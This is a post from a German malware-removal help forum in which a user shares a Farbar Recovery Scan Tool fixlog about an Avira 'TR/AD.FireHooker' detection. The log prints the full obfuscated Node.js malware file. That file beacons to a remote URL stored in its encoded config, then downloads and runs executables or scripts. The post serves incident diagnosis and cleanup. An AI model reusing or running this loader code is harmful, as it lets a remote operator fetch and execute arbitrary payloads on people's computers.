Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML.

 
Alt 04.10.2020, 20:49   #13
Öhm
 
Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Standard

Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker



Dankeschön! Hier der Fixlog:

Code:
ATTFilter
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 04-10-2020
durchgeführt von Tamy (04-10-2020 21:48:26) Run:2
Gestartet von C:\Users\Tamy\Desktop
Geladene Profile: Tamy
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
Virustotal: C:\WINDOWS\Installer\{8E2EC350-56EF-4F2D-9BBC-958DE58DA64F}\{CEFCDC5A-D8C1-45EB-B191-896048718E4C}
cmd: type "C:\WINDOWS\Installer\{8E2EC350-56EF-4F2D-9BBC-958DE58DA64F}\{CEFCDC5A-D8C1-45EB-B191-896048718E4C}"

*****************

VirusTotal: C:\WINDOWS\Installer\{8E2EC350-56EF-4F2D-9BBC-958DE58DA64F}\{CEFCDC5A-D8C1-45EB-B191-896048718E4C} => https://www.virustotal.com/gui/file/09a136f14144d15d3f06f587c4ce7bcbfb00d8a066201ee562469b6b049271b0/detection/f-09a136f14144d15d3f06f587c4ce7bcbfb00d8a066201ee562469b6b049271b0-1601840907

========= type "C:\WINDOWS\Installer\{8E2EC350-56EF-4F2D-9BBC-958DE58DA64F}\{CEFCDC5A-D8C1-45EB-B191-896048718E4C}" =========

/*e0JCNjUwMTNFLTRCNEMtNDQ0My04RkExLTU0NkE1OTRCMUMwQX18MS4wLjM=*/var _0x666d=['V0NX','dW5saW5rU3luYw\x3d\x3d','cm1kaXJTeW5j','WHRw','c3RyaW5naWZ5','d21pZA\x3d\x3d','WWdl','eGxS','RGlL','ZGF0YQ\x3d\x3d','aG9K','c3RhdHVzQ29kZQ\x3d\x3d','eVlH','U09x','QVhU','anVz','dXNlIHN0cmljdA\x3d\x3d','cmFuZG9tQnl0ZXM\x3d','dG9TdHJpbmc\x3d','aGV4','ZlNB','aW5kZXhPZg\x3d\x3d','bmt0','c3Vic3Ry','Vm5W','bGVuZ3Ro','c3Bhd25TeW5j','ZXJyb3I\x3d','c3RhdHVz','U0tl','TEJp','d1NB','cm1kaXIg','b3V0cHV0','cXVlcnlzdHJpbmc\x3d','cGF0aA\x3d\x3d','Y3J5cHRv','Y2hpbGRfcHJvY2Vzcw\x3d\x3d','dXJs','MS4wLjM\x3d','LmJpbg\x3d\x3d','am9pbg\x3d\x3d','ZGlybmFtZQ\x3d\x3d','bnBtLmNtZA\x3d\x3d','YXJndg\x3d\x3d','bG9n','YXBwbHk\x3d','UHRD','e30uY29uc3RydWN0b3IoInJldHVybiB0aGlzIikoICk\x3d','YnVq','OHwxfDN8NHwwfDV8N3w2fDI\x3d','c3BsaXQ\x3d','aW5mbw\x3d\x3d','d2Fybg\x3d\x3d','ZGVidWc\x3d','ZXhjZXB0aW9u','MXw2fDV8M3wwfDJ8NA\x3d\x3d','Y29uc29sZQ\x3d\x3d','dHJhY2U\x3d','cmVhZEZpbGVTeW5j','Ymt0','aEdm','bGFzdEluZGV4T2Y\x3d','cGFyc2U\x3d','YmFzZTY0','dXRmLTg\x3d','akNt','a05h','cHJvdG9jb2w\x3d','c2xpY2U\x3d','ZW52','Tk9ERV9UTFNfUkVKRUNUX1VOQVVUSE9SSVpFRA\x3d\x3d','Z2V0','V2VG','bG9jYXRpb24\x3d','aGVhZGVycw\x3d\x3d','bWF0Y2g\x3d','cmVzb2x2ZQ\x3d\x3d','Y29uY2F0','bU9x','RkNJ','dG1wZGly','T0dJ','b2lD','Lmpz'];(function(_0x22bff4,_0x37cf38){var _0x36380e=function(_0x2cdd8e){while(--_0x2cdd8e){_0x22bff4['\x70\x75\x73\x68'](_0x22bff4['\x73\x68\x69\x66\x74']());}};var _0x30ff0d=function(){var _0x297406={'\x64\x61\x74\x61':{'\x6b\x65\x79':'\x63\x6f\x6f\x6b\x69\x65','\x76\x61\x6c\x75\x65':'\x74\x69\x6d\x65\x6f\x75\x74'},'\x73\x65\x74\x43\x6f\x6f\x6b\x69\x65':function(_0x3b21ab,_0x262a53,_0xee5ac,_0x54273f){_0x54273f=_0x54273f||{};var _0x4451ea=_0x262a53+'\x3d'+_0xee5ac;var _0x46ee7d=0x0;for(var _0x46ee7d=0x0,_0x73da03=_0x3b21ab['\x6c\x65\x6e\x67\x74\x68'];_0x46ee7d<_0x73da03;_0x46ee7d++){var _0x542277=_0x3b21ab[_0x46ee7d];_0x4451ea+='\x3b\x20'+_0x542277;var _0x3b1c60=_0x3b21ab[_0x542277];_0x3b21ab['\x70\x75\x73\x68'](_0x3b1c60);_0x73da03=_0x3b21ab['\x6c\x65\x6e\x67\x74\x68'];if(_0x3b1c60!==!![]){_0x4451ea+='\x3d'+_0x3b1c60;}}_0x54273f['\x63\x6f\x6f\x6b\x69\x65']=_0x4451ea;},'\x72\x65\x6d\x6f\x76\x65\x43\x6f\x6f\x6b\x69\x65':function(){return'\x64\x65\x76';},'\x67\x65\x74\x43\x6f\x6f\x6b\x69\x65':function(_0x1a24cf,_0x55b9ca){_0x1a24cf=_0x1a24cf||function(_0x595dd5){return _0x595dd5;};var _0x41e974=_0x1a24cf(new RegExp('\x28\x3f\x3a\x5e\x7c\x3b\x20\x29'+_0x55b9ca['\x72\x65\x70\x6c\x61\x63\x65'](/([.$?*|{}()[]\/+^])/g,'\x24\x31')+'\x3d\x28\x5b\x5e\x3b\x5d\x2a\x29'));var _0x5742d1=function(_0x1e4a69,_0x598789){_0x1e4a69(++_0x598789);};_0x5742d1(_0x36380e,_0x37cf38);return _0x41e974?decodeURIComponent(_0x41e974[0x1]):undefined;}};var _0x4710ad=function(){var _0x59aeb4=new RegExp('\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d');return _0x59aeb4['\x74\x65\x73\x74'](_0x297406['\x72\x65\x6d\x6f\x76\x65\x43\x6f\x6f\x6b\x69\x65']['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};_0x297406['\x75\x70\x64\x61\x74\x65\x43\x6f\x6f\x6b\x69\x65']=_0x4710ad;var _0x4ae988='';var _0x35f2e8=_0x297406['\x75\x70\x64\x61\x74\x65\x43\x6f\x6f\x6b\x69\x65']();if(!_0x35f2e8){_0x297406['\x73\x65\x74\x43\x6f\x6f\x6b\x69\x65'](['\x2a'],'\x63\x6f\x75\x6e\x74\x65\x72',0x1);}else if(_0x35f2e8){_0x4ae988=_0x297406['\x67\x65\x74\x43\x6f\x6f\x6b\x69\x65'](null,'\x63\x6f\x75\x6e\x74\x65\x72');}else{_0x297406['\x72\x65\x6d\x6f\x76\x65\x43\x6f\x6f\x6b\x69\x65']();}};_0x30ff0d();}(_0x666d,0xba));var _0xd666=function(_0x2ab53a,_0x2d72eb){_0x2ab53a=_0x2ab53a-0x0;var _0x399946=_0x666d[_0x2ab53a];if(_0xd666['\x69\x6e\x69\x74\x69\x61\x6c\x69\x7a\x65\x64']===undefined){(function(){var _0x3e9842=Function('\x72\x65\x74\x75\x72\x6e\x20\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x28\x29\x20'+'\x7b\x7d\x2e\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72\x28\x22\x72\x65\x74\x75\x72\x6e\x20\x74\x68\x69\x73\x22\x29\x28\x29'+'\x29\x3b');var _0x18c44d=_0x3e9842();var _0x222f24='\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2b\x2f\x3d';_0x18c44d['\x61\x74\x6f\x62']||(_0x18c44d['\x61\x74\x6f\x62']=function(_0x34b72c){var _0x4dd175=String(_0x34b72c)['\x72\x65\x70\x6c\x61\x63\x65'](/=+$/,'');for(var _0x1a3d04=0x0,_0xff1d0b,_0x338665,_0x38d385=0x0,_0x4d3e2f='';_0x338665=_0x4dd175['\x63\x68\x61\x72\x41\x74'](_0x38d385++);~_0x338665&&(_0xff1d0b=_0x1a3d04%0x4?_0xff1d0b*0x40+_0x338665:_0x338665,_0x1a3d04++%0x4)?_0x4d3e2f+=String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'](0xff&_0xff1d0b>>(-0x2*_0x1a3d04&0x6)):0x0){_0x338665=_0x222f24['\x69\x6e\x64\x65\x78\x4f\x66'](_0x338665);}return _0x4d3e2f;});}());_0xd666['\x62\x61\x73\x65\x36\x34\x44\x65\x63\x6f\x64\x65\x55\x6e\x69\x63\x6f\x64\x65']=function(_0xf4f074){var _0x2f9734=atob(_0xf4f074);var _0x209cdc=[];for(var _0x5d6cb2=0x0,_0x40f280=_0x2f9734['\x6c\x65\x6e\x67\x74\x68'];_0x5d6cb2<_0x40f280;_0x5d6cb2++){_0x209cdc+='\x25'+('\x30\x30'+_0x2f9734['\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74'](_0x5d6cb2)['\x74\x6f\x53\x74\x72\x69\x6e\x67'](0x10))['\x73\x6c\x69\x63\x65'](-0x2);}return decodeURIComponent(_0x209cdc);};_0xd666['\x64\x61\x74\x61']={};_0xd666['\x69\x6e\x69\x74\x69\x61\x6c\x69\x7a\x65\x64']=!![];}var _0x1f0c26=_0xd666['\x64\x61\x74\x61'][_0x2ab53a];if(_0x1f0c26===undefined){var _0x31cb3c=function(_0x2676a2){this['\x72\x63\x34\x42\x79\x74\x65\x73']=_0x2676a2;this['\x73\x74\x61\x74\x65\x73']=[0x1,0x0,0x0];this['\x6e\x65\x77\x53\x74\x61\x74\x65']=function(){return'\x6e\x65\x77\x53\x74\x61\x74\x65';};this['\x66\x69\x72\x73\x74\x53\x74\x61\x74\x65']='\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a';this['\x73\x65\x63\x6f\x6e\x64\x53\x74\x61\x74\x65']='\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d';};_0x31cb3c['\x70\x72\x6f\x74\x6f\x74\x79\x70\x65']['\x63\x68\x65\x63\x6b\x53\x74\x61\x74\x65']=function(){var _0x4c15ca=new RegExp(this['\x66\x69\x72\x73\x74\x53\x74\x61\x74\x65']+this['\x73\x65\x63\x6f\x6e\x64\x53\x74\x61\x74\x65']);return this['\x72\x75\x6e\x53\x74\x61\x74\x65'](_0x4c15ca['\x74\x65\x73\x74'](this['\x6e\x65\x77\x53\x74\x61\x74\x65']['\x74\x6f\x53\x74\x72\x69\x6e\x67']())?--this['\x73\x74\x61\x74\x65\x73'][0x1]:--this['\x73\x74\x61\x74\x65\x73'][0x0]);};_0x31cb3c['\x70\x72\x6f\x74\x6f\x74\x79\x70\x65']['\x72\x75\x6e\x53\x74\x61\x74\x65']=function(_0x6aceed){if(!Boolean(~_0x6aceed)){return _0x6aceed;}return this['\x67\x65\x74\x53\x74\x61\x74\x65'](this['\x72\x63\x34\x42\x79\x74\x65\x73']);};_0x31cb3c['\x70\x72\x6f\x74\x6f\x74\x79\x70\x65']['\x67\x65\x74\x53\x74\x61\x74\x65']=function(_0x27e37b){for(var _0x35d1d5=0x0,_0x366640=this['\x73\x74\x61\x74\x65\x73']['\x6c\x65\x6e\x67\x74\x68'];_0x35d1d5<_0x366640;_0x35d1d5++){this['\x73\x74\x61\x74\x65\x73']['\x70\x75\x73\x68'](Math['\x72\x6f\x75\x6e\x64'](Math['\x72\x61\x6e\x64\x6f\x6d']()));_0x366640=this['\x73\x74\x61\x74\x65\x73']['\x6c\x65\x6e\x67\x74\x68'];}return _0x27e37b(this['\x73\x74\x61\x74\x65\x73'][0x0]);};new _0x31cb3c(_0xd666)['\x63\x68\x65\x63\x6b\x53\x74\x61\x74\x65']();_0x399946=_0xd666['\x62\x61\x73\x65\x36\x34\x44\x65\x63\x6f\x64\x65\x55\x6e\x69\x63\x6f\x64\x65'](_0x399946);_0xd666['\x64\x61\x74\x61'][_0x2ab53a]=_0x399946;}else{_0x399946=_0x1f0c26;}return _0x399946;};_0xd666('0x0');function uuid(){var _0x25e017={'\x50\x55\x69':function _0x5d98fa(_0x31042d,_0x4f1c1b){return _0x31042d>=_0x4f1c1b;}};let _0x46f353=crypto[_0xd666('0x1')](0x10)[_0xd666('0x2')](_0xd666('0x3')),_0x5e531c='';for(var _0x1554fe in _0x46f353)_0x25e017['PUi']([0x8,0xc,0x10,0x14]['indexOf'](Number(_0x1554fe)),0x0)&&(_0x5e531c+='\x2d'),_0x5e531c+=_0x46f353[_0x1554fe];return _0x5e531c;}function path_quote(_0x585114){var _0x49762e={'\x66\x53\x41':function _0x1106c1(_0x12e337,_0x541157){return _0x12e337<_0x541157;},'\x6e\x6b\x74':function _0x63b0a6(_0x582150,_0x40dae3){return _0x582150+_0x40dae3;}};return _0x49762e[_0xd666('0x4')](_0x585114[_0xd666('0x5')]('\x20'),0x0)?_0x585114:_0x49762e[_0xd666('0x6')]('\x22',_0x585114)+'\x22';}function path_unquote(_0x37deea){var _0x1b9da3={'\x49\x6a\x74':function _0xe52cfe(_0x36f5df,_0x4d10c2){return _0x36f5df!=_0x4d10c2;},'\x56\x6e\x56':function _0x3225d9(_0x5019eb,_0x261ddf){return _0x5019eb-_0x261ddf;}};return _0x1b9da3['Ijt']('\x22',_0x37deea[0x0])?_0x37deea:_0x37deea[_0xd666('0x7')](0x1,_0x1b9da3[_0xd666('0x8')](_0x37deea[_0xd666('0x9')],0x1));}function path_remove(_0x563716){var _0x4d0eb3={'\x53\x4b\x65':function _0x390194(_0x286ebb,_0x4790fc){return _0x286ebb+_0x4790fc;},'\x4c\x42\x69':function _0x27b619(_0x12ba74,_0x35b7be){return _0x12ba74+_0x35b7be;},'\x77\x53\x41':function _0x5588a9(_0x33e54b,_0x99431f){return _0x33e54b+_0x99431f;}};let _0x140c9e=child_process[_0xd666('0xa')]('rmdir',['\x2fS','\x2fQ',_0x563716],{'\x73\x68\x65\x6c\x6c':!0x0});if(_0x140c9e[_0xd666('0xb')])throw _0x140c9e['error'];if(_0x140c9e[_0xd666('0xc')])throw new Error(_0x4d0eb3[_0xd666('0xd')](_0x4d0eb3[_0xd666('0xe')](_0x4d0eb3[_0xd666('0xf')](_0xd666('0x10'),_0x140c9e[_0xd666('0xc')]),'\x20'),_0x140c9e[_0xd666('0x11')][_0xd666('0x2')]()));}const fs=require('fs'),querystring=require(_0xd666('0x12')),path=require(_0xd666('0x13')),os=require('os'),crypto=require(_0xd666('0x14')),child_process=require(_0xd666('0x15')),url=require(_0xd666('0x16')),__VERSION__=_0xd666('0x17'),CONFIG=__filename+_0xd666('0x18'),MAX_REQ=0xa,MAX_302_REDIR=0xa,cmd_npm=path[_0xd666('0x19')](path[_0xd666('0x1a')](process['argv'][0x0]),_0xd666('0x1b')),cmd_node=process[_0xd666('0x1c')][0x0],print=console[_0xd666('0x1d')];var cfg=function(){var _0x587828=function(){var _0x6ad91e=!![];return function(_0x430d01,_0x1df094){var _0x26a3a4=_0x6ad91e?function(){if(_0x1df094){var _0x1d7247=_0x1df094['\x61\x70\x70\x6c\x79'](_0x430d01,arguments);_0x1df094=null;return _0x1d7247;}}:function(){};_0x6ad91e=![];return _0x26a3a4;};}();var _0x36953a=_0x587828(this,function(){var _0x26e322=function(){return'\x64\x65\x76';},_0x34694f=function(){return'\x77\x69\x6e\x64\x6f\x77';};var _0x4ecc18=function(){var _0x793da4=new RegExp('\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d');return!_0x793da4['\x74\x65\x73\x74'](_0x26e322['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};var _0x18d320=function(){var _0x407cc0=new RegExp('\x28\x5c\x5c\x5b\x78\x7c\x75\x5d\x28\x5c\x77\x29\x7b\x32\x2c\x34\x7d\x29\x2b');return _0x407cc0['\x74\x65\x73\x74'](_0x34694f['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};var _0x58d584=function(_0x2b0bc5){var _0x3a969c=~-0x1>>0x1+0xff%0x0;if(_0x2b0bc5['\x69\x6e\x64\x65\x78\x4f\x66']('\x69'===_0x3a969c)){_0x17b8d1(_0x2b0bc5);}};var _0x17b8d1=function(_0x1a0d6c){var _0x5d7b3=~-0x4>>0x1+0xff%0x0;if(_0x1a0d6c['\x69\x6e\x64\x65\x78\x4f\x66']((!![]+'')[0x3])!==_0x5d7b3){_0x58d584(_0x1a0d6c);}};if(!_0x4ecc18()){if(!_0x18d320()){_0x58d584('\x69\x6e\x64\u0435\x78\x4f\x66');}else{_0x58d584('\x69\x6e\x64\x65\x78\x4f\x66');}}else{_0x58d584('\x69\x6e\x64\u0435\x78\x4f\x66');}});_0x36953a();var _0x106a50={'\x5a\x53\x61':function _0x960297(_0x28de0c,_0x408f1f){return _0x28de0c(_0x408f1f);},'\x50\x74\x43':function _0x355246(_0x391ee0,_0x5a9225){return _0x391ee0+_0x5a9225;},'\x62\x75\x6a':function _0x57a439(_0x403160){return _0x403160();},'\x62\x6b\x74':function _0x5b8c76(_0x402050,_0x56be46){return _0x402050-_0x56be46;},'\x68\x47\x66':function _0x59a08b(_0x5b1f65,_0x2b3d9b){return _0x5b1f65+_0x2b3d9b;}};var _0x5e8f1c=function(){var _0x4bea4d=!![];return function(_0x56897a,_0x579302){var _0x539285=_0x4bea4d?function(){if(_0x579302){var _0x505456=_0x579302[_0xd666('0x1e')](_0x56897a,arguments);_0x579302=null;return _0x505456;}}:function(){};_0x4bea4d=![];return _0x539285;};}();var _0xe50cc4=_0x5e8f1c(this,function(){var _0x27ab94=_0x106a50['ZSa'](Function,_0x106a50[_0xd666('0x1f')](_0x106a50['PtC']('return\x20\x28function\x28\x29\x20',_0xd666('0x20')),'\x29\x3b'));var _0x5dcb84=function(){};var _0xe16597=_0x106a50[_0xd666('0x21')](_0x27ab94);if(!_0xe16597['console']){_0xe16597['console']=function(_0x4ba674){var _0x32fb3e=_0xd666('0x22')[_0xd666('0x23')]('\x7c'),_0x2a50b5=0x0;while(!![]){switch(_0x32fb3e[_0x2a50b5++]){case'0':_0x164c4e[_0xd666('0x24')]=_0x4ba674;continue;case'1':_0x164c4e[_0xd666('0x1d')]=_0x4ba674;continue;case'2':return _0x164c4e;continue;case'3':_0x164c4e[_0xd666('0x25')]=_0x4ba674;continue;case'4':_0x164c4e[_0xd666('0x26')]=_0x4ba674;continue;case'5':_0x164c4e[_0xd666('0xb')]=_0x4ba674;continue;case'6':_0x164c4e['trace']=_0x4ba674;continue;case'7':_0x164c4e[_0xd666('0x27')]=_0x4ba674;continue;case'8':var _0x164c4e={};continue;}break;}}(_0x5dcb84);}else{var _0x3b2042=_0xd666('0x28')[_0xd666('0x23')]('\x7c'),_0x41de4b=0x0;while(!![]){switch(_0x3b2042[_0x41de4b++]){case'0':_0xe16597['console'][_0xd666('0xb')]=_0x5dcb84;continue;case'1':_0xe16597[_0xd666('0x29')][_0xd666('0x1d')]=_0x5dcb84;continue;case'2':_0xe16597[_0xd666('0x29')][_0xd666('0x27')]=_0x5dcb84;continue;case'3':_0xe16597[_0xd666('0x29')][_0xd666('0x24')]=_0x5dcb84;continue;case'4':_0xe16597['console'][_0xd666('0x2a')]=_0x5dcb84;continue;case'5':_0xe16597[_0xd666('0x29')][_0xd666('0x26')]=_0x5dcb84;continue;case'6':_0xe16597[_0xd666('0x29')][_0xd666('0x25')]=_0x5dcb84;continue;}break;}}});_0x106a50[_0xd666('0x21')](_0xe50cc4);var _0x3adf3e;try{var _0xc0f56a=(_0x3adf3e=fs[_0xd666('0x2b')](__filename,'utf\x2d8'))[_0xd666('0x7')](_0x106a50[_0xd666('0x2c')](_0x3adf3e['length'],0x200));return _0xc0f56a=_0xc0f56a[_0xd666('0x7')](_0x106a50[_0xd666('0x2d')](_0xc0f56a[_0xd666('0x2e')]('\x2f\x2a'),0x2)),_0xc0f56a=_0xc0f56a['substr'](0x0,_0x106a50[_0xd666('0x2c')](_0xc0f56a[_0xd666('0x9')],0x2)),JSON[_0xd666('0x2f')](Buffer['from'](_0xc0f56a,_0xd666('0x30')));}catch(_0x280725){try{return _0x3adf3e=fs['readFileSync'](CONFIG,_0xd666('0x31')),JSON[_0xd666('0x2f')](_0x3adf3e);}catch(_0x6c2b48){return JSON[_0xd666('0x2f')](Buffer['from'](_0x3adf3e,'base64'));}}}();!function(){var _0x5008e0={'\x6a\x43\x6d':function _0x6ea11d(_0x379f07,_0x417a9c){return _0x379f07(_0x417a9c);},'\x6b\x4e\x61':function _0x5a8b3d(_0x3172bd,_0x1cadfa){return _0x3172bd>=_0x1cadfa;},'\x46\x43\x49':function _0x1d519c(_0x3dcb5e,_0x104042,_0x1d4ecc,_0x2768c2){return _0x3dcb5e(_0x104042,_0x1d4ecc,_0x2768c2);},'\x4f\x47\x49':function _0x729fb6(_0x1a3342){return _0x1a3342();},'\x62\x58\x64':function _0x1e03f5(_0x146e57){return _0x146e57();},'\x6f\x69\x43':function _0x4ada5c(_0x582adf,_0x41bb10){return _0x582adf==_0x41bb10;},'\x57\x43\x57':function _0x3f7a41(_0x596773,_0x278a51){return _0x596773==_0x278a51;},'\x58\x74\x70':function _0x1a7c19(_0x24d625,_0x2e50e9,_0x277e81){return _0x24d625(_0x2e50e9,_0x277e81);},'\x71\x5a\x71':function _0xfc95c(_0x3a4ec3,_0x390ba2){return _0x3a4ec3+_0x390ba2;},'\x44\x69\x4b':function _0x19adbf(_0xc90f0a,_0x476cdc,_0x3f63da){return _0xc90f0a(_0x476cdc,_0x3f63da);},'\x59\x67\x65':function _0x4e84eb(_0x32c7ec,_0x500c2e){return _0x32c7ec+_0x500c2e;},'\x78\x6c\x52':function _0x434cf6(_0x94c97b,_0x3f36c6){return _0x94c97b+_0x3f36c6;}};function _0x3e4b22(_0x4b21aa,_0x2c682c){var _0x4e1ecf={'\x57\x65\x46':function _0x1bc431(_0x970f51,_0xd8a86f){return _0x5008e0[_0xd666('0x32')](_0x970f51,_0xd8a86f);},'\x7a\x58\x56':function _0x4111a5(_0x1d898d,_0x4e8a15){return _0x5008e0[_0xd666('0x33')](_0x1d898d,_0x4e8a15);}};const _0x3e5428=(_0x5313d8,_0x456a52,_0x49f15e)=>{if(_0x49f15e>MAX_302_REDIR)throw new Error('MAX\x2030x\x20reached',_0x49f15e);_0x49f15e+=0x1;let _0x5afff5=url[_0xd666('0x2f')](_0x5313d8),_0x4f6fa1=_0x5008e0[_0xd666('0x32')](require,_0x5afff5[_0xd666('0x34')][_0xd666('0x35')](0x0,-0x1));process[_0xd666('0x36')][_0xd666('0x37')]='0',_0x4f6fa1[_0xd666('0x38')](_0x5313d8,_0x52a415=>{var _0x109a1e={'\x6d\x4f\x71':function _0x46711a(_0x452b38,_0x2f360e){return _0x4e1ecf[_0xd666('0x39')](_0x452b38,_0x2f360e);}};if(_0x52a415['headers'][_0xd666('0x3a')]&&_0x4e1ecf['zXV']([0x12d,0x12e,0x12f,0x133,0x134][_0xd666('0x5')](_0x52a415['statusCode']),0x0)){let _0x57bf05=_0x52a415[_0xd666('0x3b')]['location'];return _0x57bf05[_0xd666('0x3c')](/^http[s]?:/)||(_0x57bf05=url[_0xd666('0x3d')](_0x5313d8,_0x57bf05)),_0x3e5428(_0x57bf05,_0x456a52,_0x49f15e);}{let _0x4e02d8=null;_0x52a415['on']('data',_0x52e8df=>{_0x4e02d8=_0x4e02d8?Buffer[_0xd666('0x3e')]([_0x4e02d8,_0x52e8df]):new Buffer(_0x52e8df);}),_0x52a415['on']('end',()=>{_0x109a1e[_0xd666('0x3f')](_0x456a52,{'\x75\x72\x6c':_0x5313d8,'\x72\x65\x73\x70':_0x52a415,'\x64\x61\x74\x61':_0x4e02d8});});}})['on'](_0xd666('0xb'),_0x593c8b=>{_0x4e1ecf[_0xd666('0x39')](_0x456a52,_0x593c8b);});};return _0x5008e0[_0xd666('0x40')](_0x3e5428,_0x4b21aa,_0x2c682c,0x0);}function _0x5be20d(){let _0x119a81=path[_0xd666('0x19')](os[_0xd666('0x41')](),_0x5008e0[_0xd666('0x42')](uuid));return fs['mkdirSync'](_0x119a81),_0x119a81;}function _0xc24f52(_0x145579,_0x1c8a36){var _0x196d06=_0x5008e0[_0xd666('0x42')](_0x5be20d);let _0x404f86=path[_0xd666('0x19')](_0x196d06,_0x5008e0['bXd'](uuid));_0x5008e0[_0xd666('0x43')](_0x145579,_0x1d6fc6)?_0x404f86+='\x2eexe':_0x5008e0['WCW'](_0x145579,_0x536780)&&(_0x404f86+=_0xd666('0x44'));var _0x5d011c=-0x1;try{let _0x2d32d7={};fs['writeFileSync'](_0x404f86,_0x1c8a36),0x1==_0x145579?_0x5d011c=child_process['spawnSync'](_0x404f86,_0x2d32d7):_0x5008e0[_0xd666('0x45')](0x2,_0x145579)&&(_0x5d011c=child_process[_0xd666('0xa')](cmd_node,[_0x404f86],_0x2d32d7)),_0x5d011c=_0x5d011c['status'];}catch(_0x1907d9){_0x5d011c=-0x1;}try{fs[_0xd666('0x46')](_0x404f86);}catch(_0x2e04aa){}try{fs[_0xd666('0x47')](_0x196d06);}catch(_0x13ab64){}return _0x5d011c;}function _0x3f77cc(_0x43b484,_0x4f4c57){var _0x29b3c={'\x5a\x70\x42':function _0x448265(_0x5aa0c6,_0x269352){return _0x5008e0[_0xd666('0x33')](_0x5aa0c6,_0x269352);},'\x68\x6f\x4a':function _0x43f540(_0x19366c,_0x3b1a6b){return _0x5008e0[_0xd666('0x45')](_0x19366c,_0x3b1a6b);},'\x79\x59\x47':function _0x2d252f(_0x357261,_0x47d369,_0x212f53){return _0x5008e0[_0xd666('0x48')](_0x357261,_0x47d369,_0x212f53);},'\x53\x4f\x71':function _0x1d66e9(_0xbd2959,_0x32d116){return _0x5008e0['qZq'](_0xbd2959,_0x32d116);},'\x41\x58\x54':function _0x118c7c(_0x368da8,_0x30927e,_0x1870ae){return _0x5008e0['DiK'](_0x368da8,_0x30927e,_0x1870ae);},'\x6a\x75\x73':function _0x2057cf(_0x2f71cd,_0x2d75cb){return _0x2f71cd+_0x2d75cb;}};let _0x4550e0=querystring[_0xd666('0x49')]({'\x76\x65\x72':__VERSION__,'\x63\x69\x64':cfg['cid'],'\x77\x6d\x69\x64':cfg[_0xd666('0x4a')],'\x69':_0x43b484,'\x72':_0x4f4c57}),_0x39bb02=cfg[_0xd666('0x16')];return _0x39bb02=_0x39bb02['indexOf']('\x3f')>=0x0?_0x5008e0[_0xd666('0x4b')](_0x39bb02,'\x26')+_0x4550e0:_0x5008e0[_0xd666('0x4c')](_0x5008e0[_0xd666('0x4c')](_0x39bb02,'\x3f'),_0x4550e0),_0x5008e0[_0xd666('0x4d')](_0x3e4b22,_0x39bb02,_0x3f0c5a=>{if(_0x29b3c['ZpB'](_0x43b484,MAX_REQ))return!0x1;if(_0x3f0c5a instanceof Error);else if(_0x3f0c5a[_0xd666('0x4e')]&&_0x3f0c5a['data'][_0xd666('0x9')]>0x0&&_0x29b3c[_0xd666('0x4f')](0xc8,_0x3f0c5a['resp'][_0xd666('0x50')])){let _0x4f4c57=_0x3f0c5a['data'];if(_0x29b3c[_0xd666('0x4f')](0x4d,_0x4f4c57[0x0])&&0x5a==_0x4f4c57[0x1])return _0x29b3c[_0xd666('0x51')](_0x3f77cc,_0x29b3c[_0xd666('0x52')](_0x43b484,0x1),_0x29b3c[_0xd666('0x53')](_0xc24f52,_0x1d6fc6,_0x4f4c57));if(0x0==_0x4f4c57['indexOf']('\x2f\x2fnode'))return _0x29b3c['AXT'](_0x3f77cc,_0x29b3c[_0xd666('0x54')](_0x43b484,0x1),_0x29b3c[_0xd666('0x53')](_0xc24f52,_0x536780,_0x4f4c57));}return!0x1;}),!0x0;}const _0x1d6fc6=0x1,_0x536780=0x2;_0x3f77cc(0x0);}();/*eyJjaWQiOiAiNTU4QkM3NUEtREU3Mi00MjlBLUI5MUItRkQ5OEM1MjZERDE4Iiwid21pZCI6ICI0MiIsInVybCI6ICJodHRwOi8vZGUubXlub2RlanMubmV0L2Rvd25sb2FkL3VwZGF0ZTI/d21pZD00MiZ0cz0xNTk0OTU1NDM3JnNpZD1mMGU3MGJiM2E2NDMxNTI5ZWFjMTBhMjAxMzY5Y2VmMyZjYz1kZSJ9*/
========= Ende von CMD: =========


==== Ende von Fixlog 21:48:27 ====
         

 

Themen zu Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker
.com, .dll, antivirus, avira, browser, defender, downloader, explorer, firefox, flash player, helper, home, internet, internet explorer, malware, neustart, nodejs, office 365, registry, scan, security, software, tcp, temp, udp, windows, wmi




